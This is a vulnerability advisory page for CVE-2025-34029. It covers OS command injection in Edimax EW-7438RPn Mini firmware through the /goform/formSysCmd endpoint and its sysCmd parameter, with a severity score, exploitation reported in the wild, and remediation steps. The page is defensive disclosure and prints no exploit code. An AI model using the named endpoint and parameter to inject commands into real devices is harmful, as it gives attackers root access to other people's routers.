EUVD-2025-18775CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Description
An OS command injection vulnerability exists in the Edimax EW-7438RPn Mini firmware version 1.13 and prior via the syscmd.asp form handler. The /goform/formSysCmd endpoint exposes a system command interface through the sysCmd parameter. A remote authenticated attacker can submit arbitrary shell commands directly, resulting in command execution as the root user. Exploitation evidence was observed by the Shadowserver Foundation on 2024-09-14 UTC.
Analysis
CVE-2025-34029 is an OS command injection vulnerability in Edimax EW-7438RPn Mini wireless router firmware version 1.13 and prior that allows authenticated remote attackers to execute arbitrary shell commands as root through the /goform/formSysCmd endpoint. The vulnerability has a CVSS score of 8.8 (High) and was observed being exploited in the wild by the Shadowserver Foundation on 2024-09-14 UTC, indicating active real-world attack activity against this widely-deployed consumer networking device.
Technical Context
The vulnerability resides in the syscmd.asp form handler, which exposes a system command interface through the 'sysCmd' parameter without proper input validation or sanitization. This is a classic OS command injection (CWE-78) vulnerability where user-supplied input from the sysCmd parameter is directly passed to shell execution functions, likely via system(), exec(), or similar UNIX command execution APIs common in embedded web-based device management interfaces. The affected device is the Edimax EW-7438RPn Mini (a compact dual-band wireless repeater/access point commonly used in enterprise and home networks), and the vulnerability exists in firmware versions 1.13 and all prior releases. The /goform/formSysCmd endpoint suggests a form-based web interface typical of embedded Linux devices using common firmware frameworks.
Affected Products
Edimax EW-7438RPn Mini wireless repeater/access point, firmware version 1.13 and all prior versions. CPE specification: cpe:2.3:o:edimax:ew-7438rpn_mini_firmware:*:*:*:*:*:*:*:* (versions up to and including 1.13). The vulnerability affects both the device hardware model EW-7438RPn with 'Mini' designation and potentially similarly-architected Edimax firmware branches. No vendor advisory URL is provided in the description; organizations should contact Edimax directly or monitor their support portal for firmware updates beyond version 1.13.
Remediation
Immediate remediation steps: (1) Upgrade Edimax EW-7438RPn Mini firmware to a version newer than 1.13 (vendor must release patched firmware—no specific patched version number provided in the description; contact Edimax support or check http://www.edimax.com for firmware downloads), (2) If patched firmware is unavailable, implement network-level mitigations: restrict access to the device management interface (port 80/443) using firewall rules, disable remote management access if enabled, and ensure the device is only accessible from trusted administrative networks, (3) Change default credentials if the device uses them (default admin username/password should be changed to strong, unique credentials), (4) Monitor network traffic to the device for suspicious /goform/formSysCmd requests, (5) Consider isolating or decommissioning affected devices in high-security environments until patching is confirmed. Check Edimax security advisories at their support site for official patches and timelines.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today